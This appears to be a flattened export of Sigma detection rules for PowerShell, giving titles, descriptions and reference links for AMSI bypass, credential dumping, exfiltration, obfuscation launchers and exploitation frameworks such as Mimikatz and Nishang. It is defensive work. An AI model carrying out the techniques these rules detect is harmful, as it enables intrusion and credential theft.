Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
AD Groups Or Users Enumeration Using PowerShell - PoshModule |
Adversaries may attempt to find domain-level groups and permission settings.
The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Remote PowerShell Session (PS Module) |
Detects remote PowerShell sessions |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Suspicious PowerShell Download - PoshModule |
Detects suspicious PowerShell download command |
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0 |
Use Get-NetTCPConnection - PowerShell Module |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell |
Suspicious PowerShell Invocations - Generic - PowerShell Module |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious PowerShell Invocations - Specific - PowerShell Module |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious Get Local Groups Information |
Adversaries may attempt to find local system groups and permission settings.
The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Suspicious Computer Machine Password by PowerShell |
The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.
You can use it to reset the password of the local computer.
|
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Suspicious Get Information for SMB Share - PowerShell Module |
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and
to identify potential systems of interest for Lateral Movement.
Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Zip A Folder With PowerShell For Staging In Temp - PowerShell Module |
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
SyncAppvPublishingServer Bypass Powershell Restriction - PS Module |
Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
AADInternals PowerShell Cmdlets Execution - PsScript |
Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. |
https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals |
Access to Browser Login Data |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
Web browsers typically store the credentials in an encrypted format within a credential store.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md |
Potential Active Directory Enumeration Using AD Module - PsScript |
Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. |
https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges |
Add Windows Capability Via PowerShell Script |
Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. |
https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content |
Powershell Add Name Resolution Policy Table Rule |
Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.
This will bypass the default DNS server and uses a specified server for answering the query.
|
https://twitter.com/NathanMcNulty/status/1569497348841287681, https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps |
PowerShell ADRecon Execution |
Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 |
https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1, https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319 |
AMSI Bypass Pattern Assembly GetType |
Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts |
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/, https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA |
Potential AMSI Bypass Script Using NULL Bits |
Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities |
https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi |
Silence.EDA Detection |
Detects Silence EmpireDNSAgent as described in the Group-IP report |
https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf |
Get-ADUser Enumeration Using UserAccountControl Flags |
Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting, https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/ |
Potential Data Exfiltration Via Audio File |
Detects potential exfiltration attempt via audio file using PowerShell |
https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1 |
Automated Collection Command PowerShell |
Once established within a system or network, an adversary may use automated techniques for collecting internal data. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md |
Windows Screen Capture with CopyFromScreen |
Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.
Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen |
Clearing Windows Console History |
Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. |
https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/, https://www.shellhacks.com/clear-history-powershell/, https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics |
Clear PowerShell History - PowerShell |
Detects keywords that could indicate clearing PowerShell history |
https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a |
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell |
Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf |
Powershell Create Scheduled Task |
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task |
Powershell Install a DLL in System Directory |
Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64" |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll |
Registry-Free Process Scope COR_PROFILER |
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.
The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).
These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.
(Citation: Microsoft Profiling Mar 2017)
(Citation: Microsoft COR_PROFILER Feb 2013)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler |
PowerShell Create Local User |
Detects creation of a local user via PowerShell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md |
Create Volume Shadow Copy with Powershell |
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information |
https://attack.mitre.org/datasources/DS0005/, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Powershell Detect Virtualization Environment |
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md, https://techgenix.com/malicious-powershell-scripts-evade-detection/ |
DirectorySearcher Powershell Exploitation |
Enumerates Active Directory to determine computers that are joined to the domain |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher |
Manipulation of User Computer or Group Security Principals Across AD |
Adversaries may create a domain account to maintain access to victim systems.
Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell, https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0 |
Disable Powershell Command History |
Detects scripts or commands that disabled the Powershell command history by removing psreadline module |
https://twitter.com/DissectMalware/status/1062879286749773824 |
Disable-WindowsOptionalFeature Command PowerShell |
Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
|
https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps |
Potential In-Memory Execution Using Reflection.Assembly |
Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50 |
Potential COM Objects Download Cradles Usage - PS Script |
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID |
https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 |
DSInternals Suspicious PowerShell Cmdlets - ScriptBlock |
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
|
https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1 |
Dump Credentials from Windows Credential Manager With PowerShell |
Adversaries may search for common password storage locations to obtain user credentials.
Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md |
Enable Windows Remote Management |
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2 |
Potential Suspicious Windows Feature Enabled |
Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
|
https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server |
Enumerate Credentials from Windows Credential Manager With PowerShell |
Adversaries may search for common password storage locations to obtain user credentials.
Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md |
Disable of ETW Trace - Powershell |
Detects usage of powershell cmdlets to disable or remove ETW trace sessions |
https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 |
Suspicious PowerShell Mailbox SMTP Forward Rule |
Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule. |
https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Certificate Exported Via PowerShell - ScriptBlock |
Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. |
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
Suspicious FromBase64String Usage On Gzip Archive - Ps Script |
Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 |
Service Registry Permissions Weakness Check |
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4 |
Active Directory Computers Enumeration With Get-AdComputer |
Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory. |
https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md |
Active Directory Group Enumeration With Get-AdGroup |
Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Suspicious Get-ADReplAccount |
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.
These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
|
https://www.powershellgallery.com/packages/DSInternals, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount |
Automated Collection Bookmarks Using Get-ChildItem PowerShell |
Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
internal network resources such as servers, tools/dashboards, or other related infrastructure.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md |
Security Software Discovery Via Powershell Script |
Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes.
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell |
HackTool - Rubeus Execution - ScriptBlock |
Detects the execution of the hacktool Rubeus using specific command line flags |
https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus |
HackTool - WinPwn Execution - ScriptBlock |
Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
|
https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team |
PowerShell Hotfix Enumeration |
Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers |
https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1 |
PowerShell ICMP Exfiltration |
Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp |
Import PowerShell Modules From Suspicious Directories |
Detects powershell scripts that import modules from suspicious directories |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md |
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript |
Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages |
https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122 |
Execute Invoke-command on Remote Host |
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4 |
Powershell DNSExfiltration |
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh, https://github.com/Arno0x/DNSExfiltrator |
Invoke-Obfuscation CLIP+ Launcher - PowerShell |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - Powershell |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - PowerShell |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - Powershell |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - Powershell |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - PowerShell |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - PowerShell |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Powershell Keylogging |
Adversaries may log user keystrokes to intercept credentials as the user types them. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1 |
Powershell LocalAccount Manipulation |
Adversaries may manipulate accounts to maintain access to victim systems.
Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1 |
Suspicious PowerShell Mailbox Export to Share - PS |
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations |
https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Malicious PowerShell Commandlets - ScriptBlock |
Detects Commandlet names from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
Live Memory Dump Using Powershell |
Detects usage of a PowerShell command to dump the live memory of a Windows machine |
https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps |
Malicious PowerShell Keywords |
Detects keywords from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921 |
Modify Group Policy Settings - ScriptBlockLogging |
Detect malicious GPO modifications can be used to implement many other malicious behaviors. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md |
Powershell MsXml COM Object |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt, https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85), https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html |
Malicious Nishang PowerShell Commandlets |
Detects Commandlet names and arguments from the Nishang exploitation framework |
https://github.com/samratashok/nishang |
NTFS Alternate Data Stream |
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. |
https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md |
Code Executed Via Office Add-in XLL File |
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.
Office add-ins can be used to add functionality to Office programs
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md |
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock |
Detects the execution of powershell scripts with calls to the "Start-NetEventSession" cmdlet. Which allows an attacker to start event and packet capture for a network event session.
Adversaries may attempt to capture network to gather information over the course of an operation.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
|
https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing, https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md, https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13 |
Potential Invoke-Mimikatz PowerShell Script |
Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords. |
https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script |
PowerShell Web Access Installation - PsScript |
Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse |
https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41 |
PowerView PowerShell Cmdlets - ScriptBlock |
Detects Cmdlet names from PowerView of the PowerSploit exploitation framework. |
